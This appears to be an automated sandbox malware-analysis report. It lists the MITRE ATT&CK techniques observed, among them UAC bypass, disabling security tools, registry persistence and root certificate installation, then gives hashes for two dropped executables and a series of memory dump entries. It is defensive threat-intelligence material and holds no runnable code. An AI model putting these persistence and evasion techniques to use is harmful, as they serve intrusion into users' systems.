Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\RarSFX0\6884gab1kb8k3p1.exe

Filesize
2.0MB

MD5
1a45a0c072a3a8dbd8a3b8d92894e3f8

SHA1
1e6db89437e0fd3bcb14c6c9dbe1ce98bb286c20

SHA256
43bb6c5aac2f0a5b2597b274c69a0fac1d5d5bd6f62fed8a7b6a203cea3d3325

SHA512
689531c4c6091f2124dd4a1750fd4b04fe282d2a61cd51ea5dc936609939f27a3025b0613384bc792c9bd57f64824535fc96ab9eca2e0dd19fb07be13dd16d42

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX1\l089d0966e530b3.exe

Filesize
1.9MB

MD5
b5ff5ef86e7f83fe0ea09efa4b2a13a5

SHA1
af3ad93fb39011d8f659fa6f4947664063319f59

SHA256
94ef4a33bf5a8f36f70612b010eebc80ef605a4ddc4526d8dd1554c5f3030019

SHA512
6dfd92e8a86fe13b0850d02551a98ee2a120087180a9263966f7e14b8a54ffa147cbe90da3fb54848a718ad8ca4b3e98dcf1c60eb8d484fdbc62390c95fef9cc

Download Submit
memory/1996-19-0x0000000003880000-0x0000000003C76000-memory.dmp

Filesize
4.0MB

Download
memory/1996-18-0x0000000003880000-0x0000000003C76000-memory.dmp

Filesize
4.0MB

Download
memory/2620-63-0x0000000005450000-0x0000000005460000-memory.dmp

Filesize
64KB

Download
memory/2620-66-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-33-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-77-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-41-0x0000000005450000-0x0000000005460000-memory.dmp

Filesize
64KB

Download
memory/2620-40-0x0000000005450000-0x0000000005460000-memory.dmp

Filesize
64KB

Download
memory/2620-58-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-61-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-62-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-76-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-64-0x0000000005450000-0x0000000005460000-memory.dmp

Filesize
64KB

Download
memory/2620-75-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-67-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-68-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-69-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-70-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-71-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-72-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-73-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2620-74-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2660-32-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2660-20-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2660-29-0x0000000005430000-0x0000000005826000-memory.dmp

Filesize
4.0MB

Download